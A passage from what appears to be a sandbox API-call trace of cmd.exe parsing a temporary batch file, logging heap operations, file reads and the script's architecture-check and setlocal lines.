dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.647] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.647] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.647] SetFilePointer (in: hFile=0x88, lDistanceToMove=1686, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x696 [0174.647] GetProcessHeap () returned 0x19a8f1e0000 [0174.647] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecc00) returned 1 [0174.647] GetProcessHeap () returned 0x19a8f1e0000 [0174.647] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0174.647] GetProcessHeap () returned 0x19a8f1e0000 [0174.647] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eddd0) returned 1 [0174.648] GetProcessHeap () returned 0x19a8f1e0000 [0174.648] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0174.648] GetProcessHeap () returned 0x19a8f1e0000 [0174.648] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ece20) returned 1 [0174.649] GetProcessHeap () returned 0x19a8f1e0000 [0174.649] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8c0) returned 1 [0174.649] GetProcessHeap () returned 0x19a8f1e0000 [0174.649] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee550) returned 1 [0174.649] GetProcessHeap () returned 0x19a8f1e0000 [0174.650] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee910) returned 1 [0174.650] GetProcessHeap () returned 0x19a8f1e0000 [0174.650] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9220) returned 1 [0174.650] GetProcessHeap () returned 0x19a8f1e0000 [0174.651] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0174.651] GetProcessHeap () returned 0x19a8f1e0000 [0174.651] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0174.651] GetProcessHeap () returned 0x19a8f1e0000 [0174.652] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edd10) returned 1 [0174.652] GetProcessHeap () returned 0x19a8f1e0000 [0174.652] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eca80) returned 1 [0174.652] GetProcessHeap () returned 0x19a8f1e0000 [0174.652] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec9a0) returned 1 [0174.652] GetProcessHeap () returned 0x19a8f1e0000 [0174.652] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0174.652] GetProcessHeap () returned 0x19a8f1e0000 [0174.653] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0174.653] GetProcessHeap () returned 0x19a8f1e0000 [0174.653] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec800) returned 1 [0174.653] GetProcessHeap () returned 0x19a8f1e0000 [0174.653] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee010) returned 1 [0174.653] GetProcessHeap () returned 0x19a8f1e0000 [0174.653] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0174.653] GetProcessHeap () returned 0x19a8f1e0000 [0174.653] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecae0) returned 1 [0174.653] GetProcessHeap () returned 0x19a8f1e0000 [0174.654] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0174.654] GetProcessHeap () returned 0x19a8f1e0000 [0174.654] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5e10) returned 1 [0174.654] GetProcessHeap () returned 0x19a8f1e0000 [0174.655] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f86a0) returned 1 [0174.655] GetProcessHeap () returned 0x19a8f1e0000 [0174.655] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0174.655] GetProcessHeap () returned 0x19a8f1e0000 [0174.655] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0174.655] GetProcessHeap () returned 0x19a8f1e0000 [0174.655] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0174.655] GetProcessHeap () returned 0x19a8f1e0000 [0174.655] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5950) returned 1 [0174.655] GetProcessHeap () returned 0x19a8f1e0000 [0174.656] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee490) returned 1 [0174.656] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.656] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x696 [0174.656] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.656] SetFilePointer (in: hFile=0x88, lDistanceToMove=1688, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x698 [0174.656] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n\nt /b\r\nstemRoot%\\Sysnative\\cmd.exe /c \"\"!_cmdf!\" %* r1\"\r\n\r\n's here\r\nRM64 Windows\r\nit Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 2 [0174.659] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.659] GetFileType (hFile=0x88) returned 0x1 [0174.659] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.659] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x698 [0174.659] GetProcessHeap () returned 0x19a8f1e0000 [0174.659] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.659] GetProcessHeap () returned 0x19a8f1e0000 [0174.659] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.660] _tell (_FileHandle=3) returned 1688 [0174.660] _close (_FileHandle=3) returned 0 [0174.660] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.660] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.660] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.660] SetFilePointer (in: hFile=0x88, lDistanceToMove=1688, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x698 [0174.660] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.660] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x698 [0174.660] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.661] SetFilePointer (in: hFile=0x88, lDistanceToMove=1784, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6f8 [0174.661] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: Re-launch the script with ARM32 process if it was initiated by x64 process on ARM64 Windows\r\n", cbMultiByte=96, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=":: Re-launch the script with ARM32 process if it was initiated by x64 process on ARM64 Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 96 [0174.661] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.661] GetFileType (hFile=0x88) returned 0x1 [0174.661] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.661] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6f8 [0174.661] GetProcessHeap () returned 0x19a8f1e0000 [0174.661] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.661] GetProcessHeap () returned 0x19a8f1e0000 [0174.661] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.662] _tell (_FileHandle=3) returned 1784 [0174.662] _close (_FileHandle=3) returned 0 [0174.662] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.662] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.662] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.662] SetFilePointer (in: hFile=0x88, lDistanceToMove=1784, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6f8 [0174.662] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.662] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6f8 [0174.662] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.662] SetFilePointer (in: hFile=0x88, lDistanceToMove=1786, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6fa [0174.663] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n Re-launch the script with ARM32 process if it was initiated by x64 process on ARM64 Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 2 [0174.663] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.663] GetFileType (hFile=0x88) returned 0x1 [0174.663] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.663] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6fa [0174.663] GetProcessHeap () returned 0x19a8f1e0000 [0174.663] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.663] GetProcessHeap () returned 0x19a8f1e0000 [0174.663] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.663] _tell (_FileHandle=3) returned 1786 [0174.664] _close (_FileHandle=3) returned 0 [0174.664] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.664] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.664] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.664] SetFilePointer (in: hFile=0x88, lDistanceToMove=1786, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6fa [0174.664] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.664] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6fa [0174.664] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.664] SetFilePointer (in: hFile=0x88, lDistanceToMove=1881, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x759 [0174.664] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if exist %SystemRoot%\\SysArm32\\cmd.exe if %PROCESSOR_ARCHITECTURE%==AMD64 if not defined r2 (\r\n", cbMultiByte=95, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if exist %SystemRoot%\\SysArm32\\cmd.exe if %PROCESSOR_ARCHITECTURE%==AMD64 if not defined r2 (\r\n\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 95 [0174.665] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.665] GetFileType (hFile=0x88) returned 0x1 [0174.665] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.665] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x759 [0174.665] GetProcessHeap () returned 0x19a8f1e0000 [0174.665] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.665] GetProcessHeap () returned 0x19a8f1e0000 [0174.665] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1fe1c0 [0174.665] GetProcessHeap () returned 0x19a8f1e0000 [0174.665] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f1eb8c0 [0174.665] GetEnvironmentVariableW (in: lpName="SystemRoot", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0xa [0174.665] GetProcessHeap () returned 0x19a8f1e0000 [0174.665] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8c0) returned 1 [0174.665] GetProcessHeap () returned 0x19a8f1e0000 [0174.666] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe1c0) returned 1 [0174.666] GetProcessHeap () returned 0x19a8f1e0000 [0174.666] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1fe1c0 [0174.666] GetProcessHeap () returned 0x19a8f1e0000 [0174.666] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x3e) returned 0x19a8f1f9270 [0174.666] GetEnvironmentVariableW (in: lpName="PROCESSOR_ARCHITECTURE", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x5 [0174.666] GetProcessHeap () returned 0x19a8f1e0000 [0174.666] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9270) returned 1 [0174.666] GetProcessHeap () returned 0x19a8f1e0000 [0174.667] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe1c0) returned 1 [0174.667] GetProcessHeap () returned 0x19a8f1e0000 [0174.667] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.667] _wcsicmp (_String1="if", _String2=")") returned 64 [0174.668] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0174.668] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0174.668] _wcsicmp (_String1="IF", _String2="if") returned 0 [0174.668] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0174.668] GetProcessHeap () returned 0x19a8f1e0000 [0174.668] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee910 [0174.668] GetProcessHeap () returned 0x19a8f1e0000 [0174.668] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1e5950 [0174.668] GetProcessHeap () returned 0x19a8f1e0000 [0174.668] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb8f0 [0174.668] GetProcessHeap () returned 0x19a8f1e0000 [0174.668] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb8f0, Size=0x1e) returned 0x19a8f1eb950 [0174.668] GetProcessHeap () returned 0x19a8f1e0000 [0174.668] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb950) returned 0x1e [0174.668] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0174.668] GetProcessHeap () returned 0x19a8f1e0000 [0174.668] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0174.668] GetProcessHeap () returned 0x19a8f1e0000 [0174.668] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb860 [0174.668] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0174.668] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0174.668] GetProcessHeap () returned 0x19a8f1e0000 [0174.668] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x48) returned 0x19a8f1f93b0 [0174.668] GetProcessHeap () returned 0x19a8f1e0000 [0174.669] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x80) returned 0x19a8f1ece20 [0174.669] GetProcessHeap () returned 0x19a8f1e0000 [0174.669] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ece20, Size=0x4a) returned 0x19a8f1ece20 [0174.669] GetProcessHeap () returned 0x19a8f1e0000 [0174.669] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ece20) returned 0x4a [0174.669] _wcsicmp (_String1="if", _String2=")") returned 64 [0174.669] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0174.669] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0174.669] _wcsicmp (_String1="IF", _String2="if") returned 0 [0174.669] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0174.669] GetProcessHeap () returned 0x19a8f1e0000 [0174.669] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee3d0 [0174.669] GetProcessHeap () returned 0x19a8f1e0000 [0174.669] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecb60 [0174.669] GetProcessHeap () returned 0x19a8f1e0000 [0174.669] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb9e0 [0174.669] GetProcessHeap () returned 0x19a8f1e0000 [0174.669] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb9e0, Size=0x1e) returned 0x19a8f1eb8c0 [0174.669] GetProcessHeap () returned 0x19a8f1e0000 [0174.669] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb8c0) returned 0x1e [0174.669] _wcsicmp (_String1="AMD64", _String2="/I") returned 50 [0174.669] GetProcessHeap () returned 0x19a8f1e0000 [0174.669] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edc50 [0174.669] GetProcessHeap () returned 0x19a8f1e0000 [0174.669] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb980 [0174.670] _wcsicmp (_String1="ERRORLEVEL", _String2="AMD64") returned 4 [0174.670] _wcsicmp (_String1="EXIST", _String2="AMD64") returned 4 [0174.670] _wcsicmp (_String1="CMDEXTVERSION", _String2="AMD64") returned 2 [0174.670] _wcsicmp (_String1="DEFINED", _String2="AMD64") returned 3 [0174.670] _wcsicmp (_String1="NOT", _String2="AMD64") returned 13 [0174.670] GetProcessHeap () returned 0x19a8f1e0000 [0174.670] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0174.670] GetProcessHeap () returned 0x19a8f1e0000 [0174.670] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb7d0 [0174.670] _wcsicmp (_String1="if", _String2=")") returned 64 [0174.670] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0174.670] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0174.670] _wcsicmp (_String1="IF", _String2="if") returned 0 [0174.670] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0174.670] GetProcessHeap () returned 0x19a8f1e0000 [0174.670] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edd10 [0174.670] GetProcessHeap () returned 0x19a8f1e0000 [0174.670] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecc80 [0174.670] GetProcessHeap () returned 0x19a8f1e0000 [0174.670] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb920 [0174.670] GetProcessHeap () returned 0x19a8f1e0000 [0174.670] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb920, Size=0x1a) returned 0x19a8f1eb9e0 [0174.670] GetProcessHeap () returned 0x19a8f1e0000 [0174.670] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb9e0) returned 0x1a [0174.670] _wcsicmp (_String1="not", _String2="/I") returned 63 [0174.671] GetProcessHeap () returned 0x19a8f1e0000 [0174.671] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1eddd0 [0174.671] GetProcessHeap () returned 0x19a8f1e0000 [0174.671] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1eca60 [0174.671] _wcsicmp (_String1="ERRORLEVEL", _String2="not") returned -9 [0174.671] _wcsicmp (_String1="EXIST", _String2="not") returned -9 [0174.671] _wcsicmp (_String1="CMDEXTVERSION", _String2="not") returned -11 [0174.671] _wcsicmp (_String1="DEFINED", _String2="not") returned -10 [0174.671] _wcsicmp (_String1="NOT", _String2="not") returned 0 [0174.671] GetProcessHeap () returned 0x19a8f1e0000 [0174.671] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0174.671] GetProcessHeap () returned 0x19a8f1e0000 [0174.671] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb800 [0174.671] _wcsicmp (_String1="ERRORLEVEL", _String2="defined") returned 1 [0174.671] _wcsicmp (_String1="EXIST", _String2="defined") returned 1 [0174.671] _wcsicmp (_String1="CMDEXTVERSION", _String2="defined") returned -1 [0174.671] _wcsicmp (_String1="DEFINED", _String2="defined") returned 0 [0174.671] GetProcessHeap () returned 0x19a8f1e0000 [0174.671] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecde0 [0174.671] GetProcessHeap () returned 0x19a8f1e0000 [0174.671] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb770 [0174.671] GetProcessHeap () returned 0x19a8f1e0000 [0174.671] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb770, Size=0x18) returned 0x19a8f1ec660 [0174.671] GetProcessHeap () returned 0x19a8f1e0000 [0174.672] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ec660) returned 0x18 [0174.672] GetProcessHeap () returned 0x19a8f1e0000 [0174.672] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee190 [0174.672] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.672] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x759 [0174.672] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe920, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe920*=0x1fff, lpOverlapped=0x0) returned 1 [0174.672] SetFilePointer (in: hFile=0x88, lDistanceToMove=1914, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x77a [0174.672] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="setlocal EnableDelayedExpansion\r\n", cbMultiByte=33, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="setlocal EnableDelayedExpansion\r\nd.exe if %PROCESSOR_ARCHITECTURE%==AMD64 if not defined r2 (\r\n\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 33 [0174.675] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.675] GetFileType (hFile=0x88) returned 0x1 [0174.675] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.675] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x77a [0174.675] GetProcessHeap () returned 0x19a8f1e0000 [0174.675] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.675] GetProcessHeap () returned 0x19a8f1e0000 [0174.676] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.676] _wcsicmp (_String1="FOR", _String2="setlocal") returned -13 [0174.676] _wcsicmp (_String1="FOR/?", _String2="setlocal") returned -13 [0174.676] _wcsicmp (_String1="IF", _String2="setlocal") returned -10 [0174.676] _wcsicmp (_String1="IF/?", _String2="setlocal") returned -10 [0174.676] _wcsicmp (_String1="REM", _String2="setlocal") returned -1 [0174.676] _wcsicmp (_String1="REM/?", _String2="setlocal") returned -1 [0174.676] GetProcessHeap () returned 0x19a8f1e0000 [0174.676] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee9d0 [0174.676] GetProcessHeap () returned 0x19a8f1e0000 [0174.676] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1eb920 [0174.676] GetProcessHeap () returned 0x19a8f1e0000 [0174.676] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f9450 [0174.676] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.676] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: 